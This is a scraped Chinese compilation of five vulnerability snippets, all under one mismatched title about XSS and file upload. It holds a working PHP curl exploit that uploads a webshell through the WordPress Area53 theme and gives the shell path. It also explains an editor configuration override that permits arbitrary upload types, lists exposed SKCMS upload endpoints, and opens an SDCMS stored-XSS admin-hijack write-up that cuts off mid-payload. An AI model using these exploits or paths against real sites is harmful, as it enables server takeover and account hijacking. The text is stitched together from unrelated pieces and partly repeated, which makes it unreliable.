好孩子某处xss+任意文件上传(共5篇)
篇1:好孩子某处xss+任意文件上传
############################################################### 标题: WordPress Area53 theme Arbitrary File Upload Vulnerability# 作者: Byakuya# 开发者: themeforest.net/# 主题连接k: themeforest.net/item/area53-a-responsive-html5-wordpress-theme/2538737# 影响版本: v1.0.1 - v1.0.5# 类型: webapps/php############################################################# # 测试利用 <?php$uploadfile = “up.php”;$ch = curl_init(“site.com/wordpress/wp-content/themes/area53/framework/_scripts/valums_uploader/php.php”);curl_setopt($ch, CURLOPT_POST, true);curl_setopt($ch, CURLOPT_POSTFIELDS,array(‘qqfile’=>”@$uploadfile”));curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);$postResult = curl_exec($ch);curl_close($ch);print “$postResult”;?> #Shell path: site.com/wordpress/wp-content/uploads/2013/10/up.php
篇2:好孩子某处xss+任意文件上传
$sUsername = “admin”;
$sPassword = “admin”;
$aStyle[1] = “gray|||gray|||office|||../uploadfile/|||550|||350|||rar|zip|exe|doc|xls|chm|hlp|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office标准风格,部分常用按钮,标准适合界面宽度|||1|||zh-cn|||0|||500|||300|||0|||版权所有...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1|||1”;
........
它将所有的风格配置信息保存为一个数组$aStyle,在register_global为on的情况下我们可以任意添加自己喜欢的风格,然后就可以在自己添加的风格中可以随意定义可上传文件类型。
这漏洞成因很简单,下面给个exp
URL:
file:
漏洞修补方法:
初始化数组$aStyle
$sUsername = “admin”;
$sPassword = “admin”;
$aStyle. = array();
篇3:好孩子某处xss+任意文件上传
SKCMS/upload/swfupload/load.asp
www.0day5.com/SKCMS/upload/swfupload/load.asp
SKCMS/upload/file_manager_json.asp
篇4:好孩子某处xss+任意文件上传
URL:
file:
漏洞修补方法:
初始化数组$aStyle
$sUsername = ”admin“;
$sPassword = ”admin“;
$aStyle. = array();
篇5:好孩子某处xss+任意文件上传
问题还是在短消息处,
SDCMS某处存储型xss可劫持管理员漏洞预警
,
之前SDCMS短消息处存在xss可以直接劫持任意指定用户,这个bug修改了,但是没有修复完全,这次来个更狠的,直接劫持管理员账户。
首先,我们发送短消息给任意存在的用户,这里我们用222222给111111账户发消息:
发送的内容我们填写
">